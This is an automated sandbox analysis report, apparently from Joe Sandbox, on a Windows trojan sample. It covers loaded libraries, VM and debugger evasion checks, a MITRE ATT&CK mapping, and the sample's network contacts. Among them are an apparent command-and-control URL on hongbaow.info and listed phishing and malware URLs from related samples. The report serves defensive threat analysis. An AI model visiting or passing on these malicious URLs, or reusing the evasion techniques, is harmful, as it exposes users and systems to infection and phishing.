Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: jhdfer3s_jh3de.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: jhdfer3s_jh3de.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: NTCreateprocess.pdb source: jhdfer3s_jh3de.exe
Source: Binary string: NTCreateprocess.pdbP$$$ source: jhdfer3s_jh3de.exe
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001A8D70 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,memmove,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,0_2_001A8D70
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A72D91 push ecx; ret 0_2_02A72DA4
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: GetProcessHeap,RtlAllocateHeap,GetAdaptersInfo,HeapFree,RtlAllocateHeap,GetAdaptersInfo,0_2_02A52220
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exe TID: 7088Thread sleep count: 50 > 30Jump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exe TID: 7088Thread sleep time: -150000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeLast function: Thread delayed
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2936607308.000000000102E000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.2936607308.0000000001102000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001B5F26 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001B5F26
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001A8D70 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,memmove,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,0_2_001A8D70
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001B68F0 GetProcessHeap,HeapAlloc,0_2_001B68F0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001A2DA0 RtlAddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription,0_2_001A2DA0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001B608B SetUnhandledExceptionFilter,0_2_001B608B
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001B63C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_001B63C8
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001B5F26 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001B5F26
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A62AEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_02A62AEB
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A5FA27 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_02A5FA27
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A6030A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_02A6030A
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A60469 SetUnhandledExceptionFilter,0_2_02A60469
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_00198050 cpuid 0_2_00198050
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001B5E01 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_001B5E01

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		11
Virtualization/Sandbox Evasion		LSASS Memory1
Query Registry		Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Disable or Modify Tools		Security Account Manager121
Security Software Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection		NTDS11
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information		LSA Secrets2
System Network Configuration Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
Obfuscated Files or Information		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
jhdfer3s_jh3de.exe11%VirustotalBrowse
jhdfer3s_jh3de.exe11%ReversingLabsWin32.Trojan.Casdet
jhdfer3s_jh3de.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://hongbaow.info/lofzqFkc7.php0%Avira URL Cloudsafe
https://hongbaow.info/90%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpI0%Avira URL Cloudsafe
https://hongbaow.info/l0%Avira URL Cloudsafe
https://hongbaow.info/0%Avira URL Cloudsafe
https://hongbaow.info/lofzqFkc7.php_0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php~0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php.com/pki/crl/products/MicCerLisCA2011_2010%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpN0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpon10%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpQ0%Avira URL Cloudsafe
https://hongbaow.info/lofzqFkc7.phpJ0%Avira URL Cloudsafe
https://hongbaow.info/WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpNVD0%Avira URL Cloudsafe
https://hongbaow.info/baow.info/lofzqFkc7.phpP0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpd0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpNVD0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpdows0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpUniv0%Avira URL Cloudsafe
https://hongbaow.info/baow.info/lofzqFkc7.php0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php17140%Avira URL Cloudsafe
https://hongbaow.info/WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpv0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpu0%Avira URL Cloudsafe
https://hongbaow.info/NVD0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpz0%Avira URL Cloudsafe
https://hongbaow.info/a0%Avira URL Cloudsafe
https://hongbaow.info/lofzqFkc7.php50%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php.0%Avira URL Cloudsafe
https://hongbaow.info/baow.info/w.info0%Avira URL Cloudsafe
https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
hongbaow.info
104.21.64.1
truefalse
    		unknown
    myexternalip.com
    		34.160.111.145
    		truefalse
      		high
      api.iplocation.net
      		172.67.68.240
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpfalse
        • Avira URL Cloud: safe
        		unknown
        https://myexternalip.com/rawfalse
          		high
          https://api.iplocation.net/?cmd=ip-country&ip=8.46.123.189false
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://hongbaow.info/jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://hongbaow.info/ljhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpIjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://hongbaow.info/lofzqFkc7.phpjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php~jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://hongbaow.info/9jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php.com/pki/crl/products/MicCerLisCA2011_201jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://api.iplocation.net/jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://hongbaow.info/lofzqFkc7.php_jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpNjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpon1jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpQjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://hongbaow.info/WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpNVDjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpdjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://hongbaow.info/lofzqFkc7.phpJjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://hongbaow.info/baow.info/lofzqFkc7.phpjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://hongbaow.info/baow.info/lofzqFkc7.phpPjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpUnivjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://api.iplocation.net/Kjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpdowsjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpNVDjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://hongbaow.info/WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://myexternalip.com/rawWPjhdfer3s_jh3de.exe, 00000000.00000002.2936607308.00000000010E5000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php1714jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpvjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpujhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://hongbaow.info/NVDjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://hongbaow.info/lofzqFkc7.php5jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpzjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://myexternalip.com/jhdfer3s_jh3de.exe, 00000000.00000002.2936607308.000000000102E000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.2936607308.00000000010E5000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://hongbaow.info/ajhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php.jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpnjhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://hongbaow.info/baow.info/w.infojhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php/jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      172.67.68.240
                      		api.iplocation.netUnited States
                      		13335CLOUDFLARENETUSfalse
                      104.21.64.1
                      		hongbaow.infoUnited States
                      		13335CLOUDFLARENETUSfalse
                      34.160.111.145
                      		myexternalip.comUnited States
                      		2686ATGS-MMD-ASUSfalse

                      General Information

                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1596616
                      Start date and time:2025-01-22 08:34:06 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 5s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:6
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:jhdfer3s_jh3de.exe
                      Detection:MAL
                      Classification:mal68.evad.winEXE@2/1@3/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 94%
                      • Number of executed functions: 25
                      • Number of non-executed functions: 73
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.253.45
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      02:35:50API Interceptor57x Sleep call for process: jhdfer3s_jh3de.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      172.67.68.240http://ur-notification-priority-fb-mail.netlify.app/Get hashmaliciousUnknownBrowse
                        EXTERNAL Completed Complete with AdobeSign Edward Has Signed Your Document. (1).msgGet hashmaliciousHTMLPhisherBrowse
                          https://www.youtube.com/attribution_link?c=coachblog-ytm-acq-int-blog-txt-coach&u=https://f%E2%93%90urholdtkommu%E2%93%9Dikatio%E2%93%9D-m%E2%93%A8.sh%E2%93%90re%E2%93%9Foint.com/:b:/g/personal/mikkel_faurholdt_com/EWts2f1DTE9GjG5fTcFSE50Bo0SXL2o6ityk-PEdrnkcbQ?e=c8X1Ps%3Fid%3Dcom.google.android.apps.youtube.musicGet hashmaliciousHTMLPhisherBrowse
                            104.21.64.1New Invoice.exeGet hashmaliciousFormBookBrowse
                            • www.sigaque.today/7c9r/
                            HAWB 074-02689536.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • www.mzkd6gp5.top/w43d/
                            NVIDIAShare.exe.bin.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                            • bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads.php
                            gem2.exeGet hashmaliciousUnknownBrowse
                            • securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                            SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                            • www.mffnow.info/0pqe/
                            4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                            • www.vilakodsiy.sbs/w7eo/
                            1162-201.exeGet hashmaliciousFormBookBrowse
                            • www.mzkd6gp5.top/utww/
                            QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                            • www.mzkd6gp5.top/3u0p/
                            Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                            • ordrr.statementquo.com/QCbxA/
                            SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                            • adsfirm.com/administrator/index.php
                            34.160.111.145SparkWarriors 1.0.0.exeGet hashmaliciousUnknownBrowse
                            • ifconfig.me/
                            W7pJyWRuxS.ps1Get hashmaliciousUnknownBrowse
                            • ifconfig.me/
                            cdwzGB7ix5.ps1Get hashmaliciousUnknownBrowse
                            • ifconfig.me/
                            file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                            • ifconfig.me/
                            Creal.exeGet hashmaliciousCreal StealerBrowse
                            • ifconfig.me/
                            #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                            • ifconfig.me/
                            SecuriteInfo.com.Variant.Fragtor.599953.20231.7803.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                            • myexternalip.com/raw
                            mek_n_bat.batGet hashmaliciousUnknownBrowse
                            • ifconfig.me/ip
                            dtyb0ut8vVGet hashmaliciousUnknownBrowse
                            • ifconfig.me/
                            file.exeGet hashmaliciousUnknownBrowse
                            • /

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            myexternalip.comSoftware_Tool.exeGet hashmaliciousUnknownBrowse
                            • 34.160.111.145
                            Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                            • 34.160.111.145
                            KltG8Z7KCn.dllGet hashmaliciousUnknownBrowse
                            • 34.160.111.145
                            KltG8Z7KCn.dllGet hashmaliciousUnknownBrowse
                            • 34.160.111.145
                            https://www.lusha.com/privacy_topic/control-your-profile/Get hashmaliciousUnknownBrowse
                            • 34.160.111.145
                            Facturation.exeGet hashmaliciousDoeneriumBrowse
                            • 34.160.111.145
                            Facturation.exeGet hashmaliciousDoeneriumBrowse
                            • 34.160.111.145
                            SecuriteInfo.com.Variant.Fragtor.599953.20231.7803.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                            • 34.160.111.145
                            fuol91mv.exeGet hashmaliciousUnknownBrowse
                            • 34.160.111.145
                            fuol91mv.exeGet hashmaliciousUnknownBrowse
                            • 34.160.111.145
                            api.iplocation.netfuol91mv.exeGet hashmaliciousUnknownBrowse
                            • 104.26.6.214
                            fuol91mv.exeGet hashmaliciousUnknownBrowse
                            • 104.26.7.214
                            http://ys-notification-priority-fb-mail.netlify.app/Get hashmaliciousUnknownBrowse
                            • 104.26.6.214
                            https://ey-notification-priority-fb-mail.netlify.app/Get hashmaliciousUnknownBrowse
                            • 104.26.6.214
                            http://ur-notification-priority-fb-mail.netlify.app/Get hashmaliciousUnknownBrowse
                            • 104.26.6.214

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            ATGS-MMD-ASUSx86.elfGet hashmaliciousMirai, MoobotBrowse
                            • 34.151.214.54
                            87.121.79.19-mips-2025-01-22T04_20_52.elfGet hashmaliciousMirai, MoobotBrowse
                            • 32.115.128.83
                            using python exe.exeGet hashmaliciousUnknownBrowse
                            • 34.133.74.21
